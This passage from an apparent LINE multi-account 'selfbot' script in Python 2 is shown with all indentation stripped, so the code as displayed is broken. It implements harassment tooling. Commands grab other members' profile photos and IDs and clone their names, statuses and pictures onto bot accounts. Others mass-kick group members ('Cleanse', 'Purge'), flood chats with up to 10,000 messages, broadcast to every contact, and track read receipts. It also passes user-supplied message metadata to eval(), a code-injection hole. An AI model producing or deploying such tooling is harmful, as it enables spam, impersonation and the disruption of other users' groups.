uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================
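# Response checks: "Responsename" makes each bot reply with its own display name; "Respon" makes each bot post a fixed marker message.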
elif msg.text.lower() == 'responsename':
if msg.from_ in admin:
profile = cl.getProfile()
text = profile.displayName + ""
cl.sendText(msg.to, text)
profile = ki.getProfile()
text = profile.displayName + ""
ki.sendText(msg.to, text)
profile = kk.getProfile()
text = profile.displayName + ""
kk.sendText(msg.to, text)
profile = kc.getProfile()
text = profile.displayName + ""
kc.sendText(msg.to, text)
profile = ks.getProfile()
text = profile.displayName + ""
ks.sendText(msg.to, text)
profile = kt.getProfile()
text = profile.displayName + ""
kt.sendText(msg.to, text)
elif msg.text in ["Respon"]:
print "EXCUTED -- ABSEN BOT"
cl.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
ki.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
kk.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
kc.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
ks.sendText(msg.to,"✴✴(iɥpɐƃuɐqɐq)")
kt.sendText(msg.to,"😗😗😗😗😗😗")
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "Cc: " in msg.text:
n = msg.text.replace("Cc: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"[%H:%M]")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
#========================================
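# Profile stealing: fetch a member's cover or profile picture by display name or mid and send the image to the chat.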
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
elif "Pict group " in msg.text:
saya = msg.text.replace('Pict group ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["My name"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["My bio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["My pict"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["My cover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif "Pap set:" in msg.text:
wait["Pap"] = msg.text.replace("Pap set:","")
cl.sendText(msg.to,"Pap Has Ben Set To")
elif msg.text in [".Pap","Pap"]:
cl.sendImageWithURL(msg.to,wait["Pap"])
#==≠============================================
elif "Vn" in msg.text:
say = msg.text.replace("Vn","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["Kalender","/waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
blan = bulan[int(bln) - 1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "Creat group" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("New", mi_d)
cl.sendText(msg.to,"Succes creat new group")
elif msg.text in ["Like:friend", "Bot like temen"]:
print "[Command]Like executed"
cl.sendText(msg.to,"pertamax")
try:
likefriend()
except:
pass
elif "Cek zodiak " in msg.text:
tanggal = msg.text.replace("Cek zodiak ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia:"+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak)
elif "Steal " in msg.text:
if msg.from_ in admin:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(salsa)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#===============================================
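# Latency checks: "Debug speed" reports a fake near-zero time, while "Sp" and "Speed" measure the round trip of a sendText call on every bot.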
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp"]:
if msg.from_ in admin:
print("Sp")
start = time.time()
cl.sendText(msg.to, "Croot......")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%s seconds" % (elapsed_time))
elif msg.text in ["Speed","speed"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
kt.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
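# Backup commands: each "BotN backup run" writes that account's display name, status message, and picture status to local text files for later restore.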
elif msg.text in ["My backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
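# Clone commands: copy a mentioned user's display name, status message, and profile picture onto the chosen bot account.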
elif "My clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
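# The "backup" commands below restore a bot's display name, status message and
# profile picture from the text files written by the matching "backup run" command above.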
elif "My backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
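# Lurking: "Lurking" sets a read point in the current chat; "Lurking result" lists
# everyone whose read receipt arrived after that point (collected in the op.type == 55 handler below).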
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurking result":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------GROUP WIPE FUNCTION WITHOUT KICKING FELLOW BOTS/ADMINS----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=======================================
#-------------------Spam functions start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Spam functions end----------------------------
#-----------------------------------------------
#-----------------------------------------------
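# "apakah" (Indonesian for "is it ...?"): replies with a random answer -
# Ya/Tidak/Mungkin/Bisa jadi (Yes/No/Maybe/Could be).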
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
# Keke is pretty <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
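# "All join" / "Masuk": temporarily open the group's invitation ticket so every helper
# bot can join via the ticket, then close the ticket again.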
elif msg.text in ["All join","Masuk"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#=====================================================================================
elif msg.text in ["Bye allgc"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
#cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Bye","pulang"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ not in target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
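# Mimic feature: when enabled, messages from targeted users are echoed back by the bot
# (the actual echoing happens in the op.type == 25 handler further below).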
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
#==========================================
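# Purge: kick every blacklisted member of the current group, using a randomly chosen kicker bot.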
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list += filter(lambda member: member == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
